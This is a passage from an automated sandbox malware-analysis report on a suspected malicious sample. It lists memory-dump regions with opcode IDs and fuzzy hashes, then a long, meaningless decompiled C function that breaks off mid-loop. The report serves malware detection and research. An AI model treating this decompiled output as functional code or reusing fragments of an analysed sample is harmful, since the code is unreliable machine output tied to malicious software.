                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea02de8f3c590c0c2259c263ed7826baac8d15e06cbfa58c2d431a6b5ee26aa1
                                  • Instruction ID: 814c70ffbc267f0febecbeee03a5848ae67cc78c3596968de8f63c81df0e7236
                                  • Opcode Fuzzy Hash: ea02de8f3c590c0c2259c263ed7826baac8d15e06cbfa58c2d431a6b5ee26aa1
                                  • Instruction Fuzzy Hash: 2001F532B001556FDB15DA689814AFF3FA69BC9750B18806AF609C7294CA71CD02D791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c48b0b36357366d90f7036a5ce1aab157e97962be1fe704ec2de19b732e5bb54
                                  • Instruction ID: 53706ee9042dabfc0be4a89095c65585f1b5320a68ccf01df0d5dc935e97c693
                                  • Opcode Fuzzy Hash: c48b0b36357366d90f7036a5ce1aab157e97962be1fe704ec2de19b732e5bb54
                                  • Instruction Fuzzy Hash: 4B11CE34A04616DFC722CF29D4848AABBF2FFC6310309C4A9D859DB269D734EA41CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c2ebfb8dc5ec43786b869f3e1a335ec0cfbbeb9de4acebdefdd53182a64d88b
                                  • Instruction ID: 00c37ffa1b38b1be0dfb4c43a672a5b2f0a31457cf3e5b58c198527fc479f349
                                  • Opcode Fuzzy Hash: 9c2ebfb8dc5ec43786b869f3e1a335ec0cfbbeb9de4acebdefdd53182a64d88b
                                  • Instruction Fuzzy Hash: CC01F530B042499BDB049BB9E8686BF3BFAEB8C305F14006DD501E7380DF35AD018B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a53f43448fdf08196602ae2290574033935be5249d5a541521c479e4ade60fb3
                                  • Instruction ID: 21509c6a1897b02dd99d2bcdd823337a553a4b2162a9743f9f953aa285aed6d2
                                  • Opcode Fuzzy Hash: a53f43448fdf08196602ae2290574033935be5249d5a541521c479e4ade60fb3
                                  • Instruction Fuzzy Hash: B701B175A002049FC714DB69D8589AFBBF6EFC9310B14816EE415EB244CA34AE05CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff5aea5e941c641af51fe88bf9dc3e0420bd7642d520d7c361e948137bae4977
                                  • Instruction ID: b8ae5c94523c903114ae80c9b4147fbf206214ee387cf9da62f262e2aafa42bc
                                  • Opcode Fuzzy Hash: ff5aea5e941c641af51fe88bf9dc3e0420bd7642d520d7c361e948137bae4977
                                  • Instruction Fuzzy Hash: EDF0B4745193C48FC7039B7C84695A53FB69F4B60872944DED1D5CF373CA2A9806DB21
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ceb65e562751c231ef12ee8921dbdeaba5e1273fb1538e42cd3aef4ae4e52b24
                                  • Instruction ID: 66604553ebcb0dcfe8c2e8d9fcb940c9fae52aa00ea4332ae5471747b868be38
                                  • Opcode Fuzzy Hash: ceb65e562751c231ef12ee8921dbdeaba5e1273fb1538e42cd3aef4ae4e52b24
                                  • Instruction Fuzzy Hash: 07018174E002199FCB54DB69E8589BFB7F6EBC8310B14856DE819E7344DA30AA05CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14a3441442b37d0a5c02d6954840ef47856e8d2a5d4848065b96c041c7394378
                                  • Instruction ID: 71dfa3ccb6752767355e33904495f048cc7b80a57fa6405af563bf6d71b06200
                                  • Opcode Fuzzy Hash: 14a3441442b37d0a5c02d6954840ef47856e8d2a5d4848065b96c041c7394378
                                  • Instruction Fuzzy Hash: 2DF04430704214DBD618AB39FD5963977A9EB81746B018068E643CB3D1CF35ED0287B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 181d78d33dd0f7e715d3edb21af9895d22b39e4dc194f5479a5c72d807f69e08
                                  • Instruction ID: 3c078243ac86f61bf3ba1a382d7296498dacabd4db0a4ad75d8094b11e0c599e
                                  • Opcode Fuzzy Hash: 181d78d33dd0f7e715d3edb21af9895d22b39e4dc194f5479a5c72d807f69e08
                                  • Instruction Fuzzy Hash: 0201F63590421ECBDF24CF99D8892EDBBB2FB48319F100426E502F2240C739DB85CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 164304910111881aea673d4276272f39450a2f1b2c2798d226f11ecce9e0dd9b
                                  • Instruction ID: d05e96b2bad953f2ec4171fe59ddb1a22d9df6840f4151de5b1ffd419dd413d2
                                  • Opcode Fuzzy Hash: 164304910111881aea673d4276272f39450a2f1b2c2798d226f11ecce9e0dd9b
                                  • Instruction Fuzzy Hash: 4DF06D71E00204EFCB06DFA8DC409EEBBB2EF99300B04C9AAE055E7250E3319E11CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e35c6409b94bc36b22efe18a30692d98f330497b706576a53efa420bb858f02f
                                  • Instruction ID: b5e307fcbe96840a22cf3c7af38b9aa9e183707d6500f6db163b50b24dfe9a11
                                  • Opcode Fuzzy Hash: e35c6409b94bc36b22efe18a30692d98f330497b706576a53efa420bb858f02f
                                  • Instruction Fuzzy Hash: D9F0A7387043509FC7155B38A8251BC3B75EF86349B01409ED586C7392CF325D0287A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 597e0733e730e515081af6675b8d1d29825e1171cfe0c0321631e43ee2ac0f5e
                                  • Instruction ID: 177e277de7d245ddc092b22444f3237bd27c1985c08bb7a038781cb9dfb7e3f3
                                  • Opcode Fuzzy Hash: 597e0733e730e515081af6675b8d1d29825e1171cfe0c0321631e43ee2ac0f5e
                                  • Instruction Fuzzy Hash: E6F01C326453009FC7069BA9E4589D53BE9EF8B36531500BAF146CF231DA75DD06CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b3e74d5a42e7688178f11f870b57522176ea8724f38d995c55bc6dc1e6bd83d
                                  • Instruction ID: e54dbf387553fe0c558fbbc7b1743b95581eb67ab57da121d5e69fb25f830ef9
                                  • Opcode Fuzzy Hash: 8b3e74d5a42e7688178f11f870b57522176ea8724f38d995c55bc6dc1e6bd83d
                                  • Instruction Fuzzy Hash: 81E0BF367001149FC7159BADE458DDA37E9EFCA752314407AF206CB320DE719D45DB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c971b835b4802ba4c1df38b8d1eb7efecbc054c7de6f5cec1ddc56ac8ffbe752
                                  • Instruction ID: 0c5e36255f3f1232b22eba39f4c4711797d634d7fb6b6910506a9e90ea52536f
                                  • Opcode Fuzzy Hash: c971b835b4802ba4c1df38b8d1eb7efecbc054c7de6f5cec1ddc56ac8ffbe752
                                  • Instruction Fuzzy Hash: CCD02B305143084BDB58EBBDE0844C93375EB93309740CDAE84054B555CB399E0A4B43
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                  • Instruction ID: f978c37ab3df3c724d4412ac78368dcf2e5d8163e5bcd02b86c9c3bf9a1ff042
                                  • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                  • Instruction Fuzzy Hash: 68C0123324D2282AE725604E7C80EB3AA8CC2C53B8A210177F91CC324198829C8001E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a5748c99f3b1fdbeff4874f0c7d7b127142d0e2c4bd42e4ced0f25f3b47c23b9
                                  • Instruction ID: c460af3fecf29dbed191b21ef7d48831215a4b78bb575584a3290fc518fffb2c
                                  • Opcode Fuzzy Hash: a5748c99f3b1fdbeff4874f0c7d7b127142d0e2c4bd42e4ced0f25f3b47c23b9
                                  • Instruction Fuzzy Hash: 88C0123011831D46C154FBEAF44889A33BEE6813493808C28850A0B4589F79BD05479A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3d15813b6f87a23981fc47a90ba62e6299a6f6ed72a6388f562c3305b0306dfb
                                  • Instruction ID: feabcdaf00f3dbce80f85af329e2a17aa4e6c7e58b7f2f3183245d948ebe1c81
                                  • Opcode Fuzzy Hash: 3d15813b6f87a23981fc47a90ba62e6299a6f6ed72a6388f562c3305b0306dfb
                                  • Instruction Fuzzy Hash: C4C012B08083C28FCB43AB7084B10E47F359E47290B18A6CBC0808E163C50A080AFB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 24394db3e044774bea912f3f67be2f5a15913ecc2052779861abafac14ce29d0
                                  • Instruction ID: ea1129ff971321b84860660080ed85580543138b2074176c7f3ecf6057a9e124
                                  • Opcode Fuzzy Hash: 24394db3e044774bea912f3f67be2f5a15913ecc2052779861abafac14ce29d0
                                  • Instruction Fuzzy Hash: 5AB012B64C07019AD6204640C904B157551EBA0702F0584346200044CD85300020E711
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                  • Associated: 00000000.00000002.478765866.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.479245167.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_950000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f2213fef062f6ab176733a2cf3cbefe6d54a01a09270a44a4242c13e436ff9af
                                  • Instruction ID: 54c6107169e71a6c0abdec2e64d1a754784009b4c929c828351db3ca451d5b55
                                  • Opcode Fuzzy Hash: f2213fef062f6ab176733a2cf3cbefe6d54a01a09270a44a4242c13e436ff9af
                                  • Instruction Fuzzy Hash: 62D2586144E3C29FC7535B788CB56E2BFB0AE2321471E49DBC4C0CF1A3E619595ADB22
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E009DD014(intOrPtr* __eax, signed int __ebx, signed char __ecx, signed int __edx, signed int __edi, void* __esi) {
                                  				signed char _t240;
                                  				signed char _t241;
                                  				signed char _t242;
                                  				intOrPtr* _t243;
                                  				intOrPtr* _t244;
                                  				signed char _t245;
                                  				signed int* _t246;
                                  				intOrPtr* _t251;
                                  				signed int _t252;
                                  				intOrPtr* _t253;
                                  				intOrPtr* _t254;
                                  				signed int* _t255;
                                  				signed int* _t258;
                                  				signed int* _t264;
                                  				signed int* _t269;
                                  				signed int* _t270;
                                  				intOrPtr* _t272;
                                  				signed int _t274;
                                  				intOrPtr* _t276;
                                  				signed int _t279;
                                  				signed int _t280;
                                  				signed int _t281;
                                  				intOrPtr* _t282;
                                  				signed int _t284;
                                  				intOrPtr* _t285;
                                  				signed int _t289;
                                  				signed int _t292;
                                  				signed char _t301;
                                  				signed char _t303;
                                  				signed int* _t305;
                                  				intOrPtr* _t306;
                                  				signed char _t308;
                                  				intOrPtr* _t309;
                                  				intOrPtr* _t310;
                                  				signed char _t311;
                                  				signed int _t314;
                                  				void* _t315;
                                  				intOrPtr* _t320;
                                  				signed char _t322;
                                  				signed int _t324;
                                  				signed int _t325;
                                  				signed int _t326;
                                  				signed char _t327;
                                  				signed int _t328;
                                  				intOrPtr* _t329;
                                  				intOrPtr* _t330;
                                  				intOrPtr* _t331;
                                  				intOrPtr* _t332;
                                  				signed int _t333;
                                  				intOrPtr* _t334;
                                  				signed char _t335;
                                  				intOrPtr* _t337;
                                  				intOrPtr* _t338;
                                  				signed int _t339;
                                  				signed char _t340;
                                  				intOrPtr* _t342;
                                  				intOrPtr* _t343;
                                  				signed int _t344;
                                  				intOrPtr* _t345;
                                  				intOrPtr* _t346;
                                  				intOrPtr* _t347;
                                  				signed int _t348;
                                  				intOrPtr* _t349;
                                  				intOrPtr* _t350;
                                  				intOrPtr* _t351;
                                  				signed int _t352;
                                  				signed char _t353;
                                  				intOrPtr* _t355;
                                  				intOrPtr* _t356;
                                  				signed char _t358;
                                  				intOrPtr* _t360;
                                  				intOrPtr* _t361;
                                  				signed char _t369;
                                  				signed char _t375;
                                  				intOrPtr* _t379;
                                  				signed char _t380;
                                  				signed char _t381;
                                  				void* _t383;
                                  				signed int _t386;
                                  				signed char _t387;
                                  				signed char _t400;
                                  				signed char _t404;
                                  				signed int _t413;
                                  				intOrPtr* _t414;
                                  				signed int _t417;
                                  				intOrPtr* _t418;
                                  				signed char _t421;
                                  				signed char _t422;
                                  				signed char _t423;
                                  				intOrPtr* _t424;
                                  				void* _t426;
                                  				signed int _t431;
                                  				signed char _t434;
                                  				intOrPtr* _t435;
                                  				signed int _t439;
                                  				signed int _t440;
                                  				signed char _t443;
                                  				intOrPtr* _t445;
                                  				intOrPtr* _t446;
                                  				intOrPtr* _t447;
                                  				signed char _t449;
                                  				signed char _t454;
                                  				signed char _t455;
                                  				signed char _t456;
                                  				signed char _t460;
                                  				signed char _t463;
                                  				signed int _t466;
                                  				signed int _t470;
                                  				signed int _t473;
                                  				signed int _t474;
                                  				signed int _t475;
                                  				signed int* _t482;
                                  				signed char _t483;
                                  				signed char _t484;
                                  				void* _t486;
                                  				intOrPtr* _t489;
                                  				signed int _t490;
                                  				signed char _t491;
                                  				signed char _t492;
                                  				signed char _t493;
                                  				signed char _t494;
                                  				signed char _t497;
                                  				intOrPtr* _t498;
                                  				void* _t499;
                                  				signed int* _t509;
                                  				intOrPtr* _t511;
                                  				signed char _t515;
                                  				intOrPtr* _t519;
                                  				intOrPtr* _t520;
                                  				intOrPtr* _t525;
                                  				signed char _t527;
                                  				intOrPtr* _t529;
                                  				intOrPtr* _t530;
                                  				signed char _t532;
                                  				signed int _t533;
                                  				signed int _t534;
                                  				signed int* _t547;
                                  				signed char _t549;
                                  				signed char _t553;
                                  				signed char _t560;
                                  				signed char _t562;
                                  				signed char _t563;
                                  				signed char _t564;
                                  				intOrPtr* _t567;
                                  				void* _t568;
                                  				signed char _t569;
                                  				void* _t570;
                                  				signed char _t571;
                                  				signed char _t572;
                                  				signed char _t573;
                                  				signed char _t574;
                                  				signed char _t578;
                                  				signed char _t579;
                                  				signed char _t580;
                                  				signed char _t582;
                                  				signed char _t583;
                                  				signed int _t588;
                                  				signed int _t589;
                                  				signed char _t590;
                                  				signed char _t591;
                                  				signed char _t592;
                                  				signed char _t593;
                                  				signed char _t594;
                                  				signed char _t595;
                                  				signed int* _t596;
                                  				signed int _t597;
                                  				intOrPtr* _t599;
                                  				signed int* _t603;
                                  				signed int* _t605;
                                  				intOrPtr* _t606;
                                  				signed int _t608;
                                  				intOrPtr* _t612;
                                  				signed int* _t613;
                                  				signed int* _t614;
                                  				void* _t615;
                                  				signed int _t616;
                                  				void* _t618;
                                  				signed char _t619;
                                  				void* _t719;
                                  				void* _t728;
                                  				signed int _t763;
                                  
                                  				_t597 = __edi;
                                  				_t553 = __ecx;
                                  				_t532 = __ebx;
                                  				_t588 = __edx & __ebx;
                                  				asm("int1");
                                  				_push(__ecx);
                                  				_t605 = __esi + _t588;
                                  				_t240 = __eax -  *__eax -  *((intOrPtr*)(__eax -  *__eax)) -  *((intOrPtr*)(__eax -  *__eax -  *((intOrPtr*)(__eax -  *__eax))));
                                  				 *__ebx =  *__ebx + _t588;
                                  				 *_t588 =  *_t588 ^ _t240;
                                  				 *_t588 =  *_t588 + __ebx;
                                  				 *_t240 =  *_t240 + _t240;
                                  				 *_t240 =  *_t240 + _t240;
                                  				while(1) {
                                  					L1:
                                  					 *_t240 =  *_t240 + _t240;
                                  					 *_t588 =  *_t588 + _t240;
                                  					 *(_t240 + 0x59000001) =  *(_t240 + 0x59000001) & _t588;
                                  					_t612 = _t612 + 1;
                                  					_t241 = _t240 + 0x28000000;
                                  					 *_t241 =  *_t241 + _t241;
                                  					 *_t605 =  *_t605 + _t588;
                                  					 *_t241 =  *_t241 + _t241;
                                  					 *((intOrPtr*)(_t241 + _t241)) =  *((intOrPtr*)(_t241 + _t241)) + _t588;
                                  					 *_t241 =  *_t241 + _t241;
                                  					asm("sbb al, 0x0");
                                  					 *_t241 =  *_t241 + _t241;
                                  					_t242 = _t241 &  *_t241;
                                  					 *_t242 =  *_t242 + _t242;
                                  					_t243 = _t242 +  *_t242;
                                  					asm("hlt");
                                  					 *_t243 =  *_t243 + _t243;
                                  					 *_t605 =  *_t605 + _t553;
                                  					_t244 = _t243 +  *[es:eax];
                                  					_t588 = _t588 - _t532;
                                  					 *_t244 =  *_t244 + _t244;
                                  					_push(es);
                                  					asm("fild word [eax]");
                                  					 *_t605 =  *_t605 + _t244;
                                  					asm("fild dword [eax]");
                                  					 *_t605 =  *_t605 + _t244;
                                  					 *_t605 =  *_t605 + _t244;
                                  					asm("fiadd dword [eax]");
                                  					 *_t605 =  *_t605 + _t244;
                                  					 *_t605 =  *_t605 + _t244;
                                  					_t553 = _t553 -  *_t244 -  *_t244 -  *_t244 -  *_t244 -  *_t244 -  *_t244;
                                  					asm("loop 0x2");
                                  					 *_t605 =  *_t605 + _t244;
                                  					_t245 = _t244 -  *_t244;
                                  					 *_t532 =  *_t532 + _t588;
                                  					 *0x4800 =  *0x4800 ^ _t245;
                                  					 *_t245 =  *_t245 + _t245;
                                  					 *_t245 =  *_t245 + _t245;
                                  					 *_t588 =  *_t588 + _t245;
                                  					 *((intOrPtr*)(0x20a0002 + _t588)) =  *((intOrPtr*)(0x20a0002 + _t588)) - _t553;
                                  					 *_t605 =  *_t605 - _t553;
                                  					_t246 = _t245 +  *_t245;
                                  					_push(es);
                                  					while(1) {
                                  						L2:
                                  						_t240 = _t246 +  *_t588;
                                  						if(_t240 != 0) {
                                  							goto L1;
                                  						}
                                  						 *_t240 =  *_t240 + _t240;
                                  						_pop(ss);
                                  						_t606 = _t605 +  *((intOrPtr*)(_t532 + 0x13));
                                  						_push(es);
                                  						 *_t588 =  *_t588 - _t553;
                                  						_push(es);
                                  						while(1) {
                                  							_t251 =  *_t588;
                                  							 *_t588 =  *_t588 + _t553;
                                  							 *((intOrPtr*)(_t588 + _t251 + 0x1a2c0a00)) =  *((intOrPtr*)(_t588 + _t251 + 0x1a2c0a00)) - _t553;
                                  							_t560 = _t553 +  *_t597 +  *_t251;
                                  							_t252 = _t588;
                                  							 *_t588 =  *_t588 + _t560;
                                  							 *((intOrPtr*)(_t606 + 0x20a0002)) =  *((intOrPtr*)(_t606 + 0x20a0002)) - _t560;
                                  							while(1) {
                                  								L5:
                                  								 *_t588 =  *_t588 + _t560;
                                  								_t562 = _t560 +  *_t597 +  *_t252;
                                  								_pop( *__edx);
                                  								 *_t588 =  *_t588 + _t562;
                                  								 *((intOrPtr*)(_t252 + 0x2a0a0002)) =  *((intOrPtr*)(_t252 + 0x2a0a0002)) - _t588;
                                  								asm("adc esi, [eax]");
                                  								_t253 = _t252 +  *_t252;
                                  								 *_t253 =  *_t253;
                                  								 *((intOrPtr*)(_t606 + 0x3110000)) =  *((intOrPtr*)(_t606 + 0x3110000)) + _t562;
                                  								asm("outsd");
                                  								_t254 = _t612;
                                  								_t612 = _t253;
                                  								_t255 = _t254 +  *_t254;
                                  								_t533 = _t532 |  *_t255;
                                  								_t589 = _t588 ^  *0x3092802;
                                  								 *_t606 =  *_t606 + _t255;
                                  								asm("outsd");
                                  								 *_t606 =  *_t606 + _t255;
                                  								_t605 = _t255 - 0x6f170308;
                                  								_t258 = _t606 +  *_t606;
                                  								_t563 = _t562 |  *_t589;
                                  								 *((intOrPtr*)(_t597 + 0x170a0002)) =  *((intOrPtr*)(_t597 + 0x170a0002)) - _t589;
                                  								while(1) {
                                  									L6:
                                  									_t588 = _t589 |  *_t258;
                                  									_pop(_t599);
                                  									_pop(ss);
                                  									 *_t563 =  *_t563 + 1;
                                  									_t553 = _t563 |  *(_t597 +  *_t597);
                                  									_t246 = _t599 +  *_t599;
                                  									_t532 = _t533 |  *_t246;
                                  									_pop(_t597);
                                  									asm("sbb dh, bh");
                                  									 *_t532 =  *_t532 + _t553;
                                  									if( *_t532 <= 0) {
                                  										goto L2;
                                  									}
                                  									 *_t246 = _t246 +  *_t246;
                                  									asm("outsd");
                                  									_t613 =  &(_t246[0]);
                                  									_t264 = _t612 +  *_t612;
                                  									_t553 = _t553 |  *_t264;
                                  									_push(_t613);
                                  									 *_t264 = _t264 +  *_t264;
                                  									_t612 = _t613 -  *0x122c062a;
                                  									if(_t612 <= 0) {
                                  										_t251 =  *_t588;
                                  										 *_t588 =  *_t588 + _t553;
                                  										 *((intOrPtr*)(_t588 + _t251 + 0x1a2c0a00)) =  *((intOrPtr*)(_t588 + _t251 + 0x1a2c0a00)) - _t553;
                                  										_t560 = _t553 +  *_t597 +  *_t251;
                                  										_t252 = _t588;
                                  										 *_t588 =  *_t588 + _t560;
                                  										 *((intOrPtr*)(_t606 + 0x20a0002)) =  *((intOrPtr*)(_t606 + 0x20a0002)) - _t560;
                                  										L5:
                                  										 *_t588 =  *_t588 + _t560;
                                  										_t562 = _t560 +  *_t597 +  *_t252;
                                  										_pop( *__edx);
                                  										 *_t588 =  *_t588 + _t562;
                                  										 *((intOrPtr*)(_t252 + 0x2a0a0002)) =  *((intOrPtr*)(_t252 + 0x2a0a0002)) - _t588;
                                  										asm("adc esi, [eax]");
                                  										_t253 = _t252 +  *_t252;
                                  										 *_t253 =  *_t253;
                                  										 *((intOrPtr*)(_t606 + 0x3110000)) =  *((intOrPtr*)(_t606 + 0x3110000)) + _t562;
                                  										asm("outsd");
                                  										_t254 = _t612;
                                  										_t612 = _t253;
                                  										_t255 = _t254 +  *_t254;
                                  										_t533 = _t532 |  *_t255;
                                  										_t589 = _t588 ^  *0x3092802;
                                  										 *_t606 =  *_t606 + _t255;
                                  										asm("outsd");
                                  										 *_t606 =  *_t606 + _t255;
                                  										_t605 = _t255 - 0x6f170308;
                                  										_t258 = _t606 +  *_t606;
                                  										_t563 = _t562 |  *_t589;
                                  										 *((intOrPtr*)(_t597 + 0x170a0002)) =  *((intOrPtr*)(_t597 + 0x170a0002)) - _t589;
                                  										continue;
                                  									}
                                  									 *_t264 = _t264 +  *_t264;
                                  									asm("outsd");
                                  									_t614 =  &(_t264[0]);
                                  									_t252 = _t612 +  *_t612;
                                  									_t560 = _t553 |  *_t252;
                                  									_push(_t614);
                                  									 *_t252 =  *_t252 + _t252;
                                  									_t612 = _t614 -  *0x1a2c0715;
                                  									if(_t612 <= 0) {
                                  										goto L5;
                                  									}
                                  									 *_t252 =  *_t252 + _t252;
                                  									asm("outsd");
                                  									_t615 = _t252 + 3;
                                  									_t269 = _t612 +  *_t612;
                                  									_t564 = _t560 |  *_t269;
                                  									_push(_t615);
                                  									 *_t269 = _t269 +  *_t269;
                                  									_t612 = _t615 -  *((intOrPtr*)(_t269 + _t564));
                                  									_t590 = _t588 +  *_t597;
                                  									asm("outsd");
                                  									_t270 = _t605;
                                  									_t605 = _t269;
                                  									_t563 = _t564 |  *_t590;
                                  									_t272 = _t270 +  *_t270 +  *_t532;
                                  									 *((intOrPtr*)(_t272 + 0x2a0a0002)) =  *((intOrPtr*)(_t272 + 0x2a0a0002)) - _t532;
                                  									asm("adc esi, [eax]");
                                  									_t274 = _t272 +  *_t272 & 0x00000000;
                                  									 *_t274 =  *_t274 + _t274;
                                  									if ( *_t274 != 0) goto L10;
                                  									 *_t563 =  *_t563 + _t590;
                                  									while(1) {
                                  										L11:
                                  										_t533 = _t532 +  *((intOrPtr*)(_t532 - 0x7a));
                                  										 *_t274 =  *_t274 + _t274;
                                  										_t258 = _t274 + 0x2c;
                                  										 *_t590 =  *_t590 + _t612;
                                  										_t589 = _t590 +  *_t597;
                                  										if(_t589 >= 0) {
                                  											goto L6;
                                  										}
                                  										 *_t258 = _t258 +  *_t258;
                                  										_pop(_t612);
                                  										_t276 =  &(_t258[0x1c]) - 0x73187000;
                                  										while(1) {
                                  											asm("cdq");
                                  											_t563 = _t563 |  *_t589;
